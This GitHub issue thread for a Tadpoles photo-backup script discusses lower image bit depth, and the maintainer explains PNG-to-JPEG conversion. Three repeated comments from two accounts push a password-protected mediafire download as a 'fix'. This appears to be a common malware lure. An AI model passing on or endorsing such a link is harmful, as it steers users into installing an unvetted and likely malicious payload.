### ISSUE TITLE
[BUG] - Downloaded/backed up Image Quality is not the highest available on Tadpoles server

### ISSUE THREAD

**Issue by User10Billion** [leocov-dev/tadpoles-backup#52]
Description
Thank you for the great and WORKING script !

Summary
Downloaded/backed up Image Quality is not the highest available on Tadpoles server

Details
compared many files backed up with another tool ( Jwally tadpoles-media-downloader , I believe ), which tools fails presently, unfortunately on some media types ...
anyway
compared many files backed up with another tool to images backed up with this tool and here are the results
Other tool would always pull highest quality of the file available.
Whereas this tool pulls lower Bit Depth images

sample file compared
Other tool: Bit Depth = 32
This tool : Bit Depth = 24

Other tool: size = 1.93 MB
This tool : size = 255 KB

Kindly check if you can alter the script to download best Image Quality possible

Thank you

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by leocov-dev** [comment]
Please provide a reference for the tool that fetches images at other quality. Its not clear to my how this is done. The current code fetches event attachments from the API and downloads them directly from cloud storage.

**Comment by leocov-dev** [comment]
I missed the reference to `tadpoles-media-downloader` sorry.
 
I read through the reference code and the process I use in this code is exactly the same.

However my code does additional processing on the image files to convert them all to JPEG if they are not already. 
This is because the tadpoles API has incorrect metadata and describes some attachments with `"mime_type": "image/jpeg"` even though the file is actually something else like a PNG. 
My code looks at the file header bytes to determine the true type and encodes all files as JPEG for consistency. This also makes it easier to apply EXIF tags.

This may seem strange because you can download a file from the Tadpoles webpage and it will get the `.jpeg` extension and your computer will display it and you can see in the properties that it is 32bit. However it is still actually a PNG. Almost all image handling software is very compliant and does not rely solely on the file extension but instead reads the file header.

Addressing your concern about inherent quality - my personal belief is that the converted JPEG is essentially equivalent to the PNG in this use-case. This may be controversial but the effort required to support arbitrary file types and also apply EXIF tags is more than I'm willing to do.

**Comment by User10Billion** [comment]
Hi,
 Thank you for prompt reply and detailed explanation.
 the file type may be the case indeed ...

I will request backup from Tadpoles  and compare all 3 versions, just curious to see how it comes form them ( it is only 1 month at the time as far as I understand) 

Thanks again for the working and supported code  !
